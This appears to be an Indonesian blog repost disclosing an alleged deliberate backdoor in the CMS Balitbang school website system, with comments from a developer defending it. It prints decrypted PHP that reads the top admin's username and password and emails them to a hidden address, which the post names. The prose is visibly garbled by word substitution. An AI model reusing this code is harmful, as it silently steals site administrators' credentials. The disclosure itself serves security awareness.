Skandal Programer Cms Balitbang Kemdiknas Ri
Cms Balitbang yaitu sebuah cms yang bersifaf open source artinya kita sanggup menggunakan ataupun memodifikasinya dengan sayrat dan aturran tertentu. Cms ini sudah banyak digunakan oleh sekolah - sekolah yang ada diseluruh Indonesia alasannya yaitu kegampangan serta kemudahan yang terdapat di cms tersebut. Namun dibalik tiruana kegampangan dan kemudahan yang disediakan oleh cms tersebut ternyata cms ini mempunyai sebuah rahasiah. Terdapat sebuah Bug/Bacdoor yang diduga ditanam secara sengaja oleh develop cms tersebut. Saya sendiri merasa terkejut ketika mendengar diberita ini dari salah seorang mitra dan diberikut yaitu kutipan diberitanya
Kali ini kami ingin membongkar skandal programer CMS Balitbang yang di gunakan oleh banyak forum pendidikan SD,SMP dan SMA/K, Sebuah sistem Model Website Sekolah yg di rancang oleh kajianwebsite.org dengan Balitbang Kemdiknas RI , hingga ketika ini yang menggunakan sistem tsb berkisar 100 ribu lebih forum pendidikan baik SD,SMP dan SMA/K.
Kali ini kami ingin membongkar skandal programer CMS Balitbang yang di gunakan oleh banyak forum pendidikan SD,SMP dan SMA/K, Sebuah sistem Model Website Sekolah yg di rancang oleh kajianwebsite.org dengan Balitbang Kemdiknas RI , hingga ketika ini yang menggunakan sistem tsb berkisar 100 ribu lebih forum pendidikan baik SD,SMP dan SMA/K.
Awal dongeng rekan kami sebut saja "Mawar" dari salah satu forum pendidikan ingin meningkatkan IT di lembaganya salah satunya membangun sebuah website resmi. Dari informasi yg kami sanggup Mawar di tawari untuk menggunakan sistem CMS Balitbang tsb alasannya yaitu pemakainya sudah sangat banyak dan ada pelatispesialuntuk oleh petinggi di forum tsb. Mawarpun kemudian konsultasi dengan kami manis atau tidak sistem tsb di gunakan.
Kamipun mulai mencari tahu ihwal sistem CMS Balitbang tsb dari banyak sekali sumber dan di sanggup banyak sekali penggunaya di seluruh Indonesia dan kamipun melihat ada pelatispesialuntuk juga kami berpikir wajarlah itu sistem yg berdiri sekelas Kementrian, dengan keyakinan hal tsb kamipun mulai mencari dimana sanggup mendapat CMS Balitbang tsb karenanya ketemu dan kami download versi terbarunya "CMS Balitbang 3.5.2".
Kami mulai membentuk tim di medan terdiri dari 5 anggota, kita tiruana setuju akan melaksanakan analisa 1 hari dengan sistem tsb. Hari diberikutnya pun tiba, tiruana anggota sudah siap menyapaikan hasilnya.
1. Di temukan sebuah bug upload yg sangat berbahaya di versi sebelumnya versi 3.4
2. Ini yg kami tidak habis pikir, terdapat celah yg sengaja di buat oleh sang programer di tiruana versi termasuk versi CMS Balitbang 3.5.2.
Pembahasan:
1. Masalah bug itu masuk akal namanya sistem tidak ada yg tepat dan walau sempat menjadi sasaran oleh kawan2 yg jahil untuk melaksanakan hacking di sistem tsb "anda sanggup cek di google banyak sekali tutor hack sistem tsb" tapi duduk masalah bug ini selesai setelah di rilis versi terbarunya.
2. Hal yg paling kami sorot yaitu hal yg ke dua ini ihwal penanaman backdor/celah oleh sang programer, bergotong-royong kami sering menumukan hal menyerupai ini di banyak CMS yg pernah kami teliti, tapi yg membuat kami mengelus dada yaitu ini sistem yg di rancang bersama Kemdiknas RI.
Hal Teknik :
Jadi inti nya di sistem tsb sudah di taruh sebuah file yg di rancang untuk mengirim User dan Password dari admin yg menggunakan sistem tsb ke salah satu email.
Kami sebut saja filenya berjulukan "admin2.php" di letakan di folder "functions"
Kode yg terdapat dalam file tsb sebagai diberikut:
Terlhiat sangat terang sang programer sengaja merahasiakan isi arahan script yg orisinil dengan meng'enkripsi menyerupai yg terlihat di atas. Kamipun berusaha cari tahu apa yg ada di balik arahan tsb dengen mencoba mendecrypt code tsb tapi kok masih ter'encrypt ....... ?? ternyata sang programer sengaja membuat encrypt tsb samapi 7 kali perulangan :D itu mungkin di lakukan untuk mengecoh jika ada yg ingin mendecrypt
Hasil Decrypt:
=======
include "koneksi.php";
include "fungsi_pass.php";
data = "";
$query="select userid, count(menu) as jum from user_level group by userid order by jum desc "; $alan=mysql_query($query) or die ("query gagal");
if($row=mysql_fetch_array($alan)){
$query2="select * from user where userid='$row[userid]' ";
$alan2=mysql_query($query2) or die ("query gagal");
$r=mysql_fetch_array($alan2);
$data .="top admin : $r[username] ----- Password : ".unhex($r[password],82)."";
}
$data .= "";
$email = unhex("64gbfc1b580c1c1bab3cb92848abfc4c0b3beb3",82);
$headers = "From: \"Komunitas $nmsekolah\" <$webmail>\r\n";
$headers .= "Content-type: text/html\r\n";
mail($email, "Komunitas $nmsekolah :: Pesan gres ::", $data, $headers);
echo "Pesan terkirim";
========
Nah itulah arahan yg orisinil dari situ kami sanggup jelasakan bahwa inti barisan arahan tsb
1. Mencari data user dan password yg mempunya hak saluran penuh dalam sistem tsb
2. Melakukan peracangan format email yg di sertai dari data user dan password yg di sanggup tadi.
3. Menetukan email yg akan di tuju di sini email pun di ecrypt lagi :) perhatikan baris kode
- "$email = unhex("64gbfc1b580c1c1bab3cb92848abfc4c0b3beb3",82);" di encrypt menggunnkana fungsi "unhex" fungsi "unhex" itu pun di buat sendiri oleh programer. Sesudah kami berusaha mendercypt di hasilkan sebuah alamat email "alanrm82@yahoo.com" itulah email tujuan nya.
4. Melakukan perintah pengiriman format email yg tadi sudah di rancang dengan beserta ada user dan password sistem tsb ke email "alanrm82@yahoo.com".
++++++++++++++++++++++++++++
melaluiataubersamaini itu sang programer sanggup setiap ketika masuk ke sistem di lebih dari 100 Ribu forum pendidikan yg menggunakan sistem tsb secara tidak sah.
Kami menyarankan bagi pengguna sistem CMS Balitbang yg melihat artikel ini untuk di kroscek ulang ihwal sistem yg anda gunakan terkena privasi dan keamanan data yg ada di Lembaga pendidikan anda.
Masuk insiden awal kami pun menyarakan supaya Mawar rekan kami untuk tidak menggunakan sistem CMS Balitbang tsb.
Mungkin Pesan kami buat kawan2 Programer tidakbolehlah menjatuhkan harga diri anda sendiri denga hal2 konyol menyerupai masalah yg kami bahas ini.
++++++++++++++++++++++++++++++++++++
Ada Klarifikasi di komentar dari salah satu anggota tim CMS Balitbang kami masukan di sini :
---------------------------------------- 1 ---
Choirul Anam =>
"Saya gres saja mendapat link pembicaraan ini dari seorang kenalan. Saya yaitu salah satu anggota team yang ikut andil dlam melahirkan CMS ini. Saya akan klarifikasi. Teman2 mohon tidak eksklusif menjustifikasi negatif ihwal pemasangan backdor tersebut. Ini ada latar belakangnya. Pada awal kelahirannya dulu CMS ini tidak spesialuntuk digunakan oleh sekolah, tetapi digunakan juga oleh dunia bisnis, bahkan pemasangannya dibisniskan oleh beberapa pengembang website komersial. Kita tidak menginginkan hal ini terjadi. Maka disahkan pemasangan backdor ini. Intinya back dor tersebut dipasang untuk pengamanan intra, artinya tidakboleh hingga CMS ini digunakan untuk dikomersialkan atau untuk webiste dengan isi negatif. Kita tidak punya mahsud apa2. Tidak akan mengambil laba apapun dari pemasangan back dor tersebut. Dan perlu kawan2 ketahui, pembuatan CMS ini bertujuan untuk mempergampang sekolah dalam membuat website, bahkan yang ikut petesnya akan memperoleh domain dan hosting gratis. Itu yang sanggup saya klarifikasi, semoga ada manfaatnya, terima kasih"
Kami membalas =>
Terimakasih bung atas atensinya penjelasan hal ini, di sinipun kami juga tidak ingin melaksanakan pemojokan kepada siapapun. Kami mengharap siapaun yng berbagi sebuah sistem opensource untuk juga mengutamakan Privasi dari pengguna sistem tsb. Mungkin ada cara lain yg sanggup di lakukan selain membuat privasi pengguna terganggu untuk mennaggulangi masalah comersialisasi tsb. Coba kita ambil pola terburuk jika sistem terjadi duduk masalah data misal manipulasi negatif, apa bukanya pihak yg menanam backdor malah yg menjadi tujuan Fitnah. Sebelumnya terimkasih atas Klarifikasinya bung akan kami akan masukan di note kami ini."
---------------------------------------- 2 ---
Choirul Anam =>
Sebenarnya duduk masalah backdor itu sudah pernah ada yang memunculkan sekitar 3 tahun yang kemudian dari Malang. Dan sudah dibicarakan dengan pihak Balitbang, hasilnya Balitbang meminta supaya backdornya tetap ada supaya sanggup digunakan sebagai materi utk memonitor jumlah pengguna CMS ini. Saya mengikuti pengembangannya hingga versi 3.50, dilakukan pada Desember 2012. Versi sesudahnya saya tidak ikut lagi alasannya yaitu kesibukan di sekolah semakin banyak. Untuk usulnya itu, saya akan coba teruskan ke pihak Balitbang. Terima kasih. Saya off dulu yaaa, mau berangkat ronda.
Nama Disamarkan =>
ngutip perkataan kakak developernya, "... hasilnya Balitbang meminta supaya backdornya tetap ada supaya sanggup digunakan sebagai materi utk memonitor jumlah pengguna CMS ini"
apakah memonitor pengguna cms dengan cara mengirim user + pass admin ke email tertentu? apakah tidak ada cara yang lebih 'terhormat'? saya bersyukur sekali malah, ada cms buatan anak indonesia yang sanggup digunakan untuk mempergampang kelancaran proses go onlne sekolah2 di indonesia, tapi saya tidak habis pikir, kenapa sanggup hal semacam ini terpikir oleh developer2 handal? ataukah ini memang sengaja di rencanakan / seruan dari pihak balitbang sendiri? kita sebagai rakyat indonesia yang mendambakan keadilan harus memulai dari hal2 kecil menyerupai ini, alasannya yaitu kalo hal menyerupai ini saja tidak sanggup diselesaikan, apalagi duduk masalah besar yang lain?
++++++++++++++++++++++++++++++++++++
Sumber : Kopaci
Post a Comment for "Skandal Programer Cms Balitbang Kemdiknas Ri"